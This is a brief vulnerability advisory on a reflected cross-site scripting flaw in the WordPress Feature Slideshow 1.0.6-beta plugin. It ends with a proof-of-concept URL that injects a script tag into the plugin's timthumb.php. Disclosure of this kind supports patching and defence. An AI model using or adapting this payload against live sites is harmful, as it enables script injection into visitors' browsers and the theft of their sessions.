WordPress Feature Slideshow plugin version 1.0.6-beta suffers from a reflective cross site scripting vulnerability.
b8974ccfc7e597ee9456f3e49b4b8ae8e5b5d9309950913afb6c7caca001994a
------------------------------------------------------------------------
Software................WordPress Feature Slideshow 1.0.6-beta
Vulnerability...........Reflected Cross-site Scripting
Download................http://sleek.no/kunder/138
Release Date............1/24/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in WordPress Feature
Slideshow 1.0.6-beta can be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/wordpress/wp-content/plugins/feature-slideshow/timthumb.php?src=<script>alert(0)</script>